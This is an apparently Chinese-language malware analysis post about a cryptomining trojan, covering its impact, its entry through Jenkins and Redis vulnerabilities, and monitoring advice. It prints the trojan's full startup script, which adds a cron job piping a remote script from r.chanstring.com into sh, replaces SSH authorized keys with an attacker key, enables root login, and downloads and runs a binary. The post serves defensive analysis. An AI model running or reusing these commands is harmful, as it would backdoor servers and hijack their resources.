書接上文,針對編號101樣本的分析捣染,我們已經(jīng)知道,黑色產(chǎn)業(yè)界通過植入木馬停巷,控制了大量主機(jī)資源耍攘,只要有人花錢榕栏,就可以按需要調(diào)度足夠的資源發(fā)動DDos攻擊,據(jù)說還可以按效果付費(fèi)蕾各。
此外扒磁,還有一種常見模式則是“挖礦木馬”,首先還是來看樣本:
root 3744 29921 0 19:53 pts/0 00:00:00 grep min
root 31333 1 99 19:48 ? 02:46:38
/opt/minerd -B -a cryptonight
-o stratum+tcp://xmr.crypto-pool.fr:8080 -u
48vKMSzWMF8TCVvMJ6jV1BfKZJFwNXRntazXquc7fvq9DW23GKk
cvQMinrKeQ1vuxD4RTmiYmCwY4inWmvCXWbcJHL3JDwp -p x
uptime看到的負(fù)載值非常高式曲。
啟動腳本
echo "*/15 * * * * curl -fsSL https://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/15 * * * * curl -fsSL https://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq
echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
/etc/init.d/sshd restart
fi
if [ ! -f "/etc/init.d/lady" ]; then
if [ ! -f "/etc/systemd/system/lady.service" ]; then
mkdir -p /opt
curl -fsSL https://r.chanstring.com/v12/lady_`uname -i` -o /opt/KHK75NEOiq33 && chmod +x /opt/KHK75NEOiq33 && /opt/KHK75NEOiq33
fi
fi
service lady start
systemctl start lady.service
/etc/init.d/lady start
echo "*/15 * * * * curl -fsSL https://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/15 * * * * curl -fsSL https://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq
echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
/etc/init.d/sshd restart
fi
if [ ! -f "/etc/init.d/lady" ]; then
if [ ! -f "/etc/systemd/system/lady.service" ]; then
mkdir -p /opt
curl -fsSL https://r.chanstring.com/v12/lady_`uname -i` -o /opt/KHK75NEOiq33 && chmod +x /opt/KHK75NEOiq33 && /opt/KHK75NEOiq33
fi
fi
service lady start
systemctl start lady.service
/etc/init.d/lady start
mkdir -p /opt
# /etc/init.d/lady stop
# systemctl stop lady.service
# pkill /opt/cron
# pkill /usr/bin/cron
# rm -rf /etc/init.d/lady
# rm -rf /etc/systemd/system/lady.service
# rm -rf /opt/KHK75NEOiq33
# rm -rf /usr/bin/cron
# rm -rf /usr/bin/.cron.old
# rm -rf /usr/bin/.cron.new
商業(yè)模式
被植入比特幣“挖礦木馬”的電腦妨托,系統(tǒng)性能會受到較大影響,電腦操作會明顯卡慢吝羞、散熱風(fēng)扇狂轉(zhuǎn)兰伤;另一個危害在于,“挖礦木馬”會大量耗電钧排,并造成顯卡敦腔、CPU等硬件急劇損耗。比特幣具有匿名屬性恨溜,其交易過程是不可逆的符衔,被盜后根本無法查詢是被誰盜取,流向哪里筒捺,因此也成為黑客的重點竊取對象柏腻。
攻擊&防御
植入方式:安全防護(hù)策略薄弱,利用Jenkins系吭、Redis等中間件的漏洞發(fā)起攻擊五嫂,獲得root權(quán)限。
最好的防御可能還是做好防護(hù)策略肯尺、嚴(yán)密監(jiān)控服務(wù)器資源消耗(CPU/load)沃缘。
這種木馬很容易變種,很多情況殺毒軟件未必能夠識別:
63210b24f42c05b2c5f8fd62e98dba6de45c7d751a2e55700d22983772886017
QQ20160711-0.png
chanstring.png
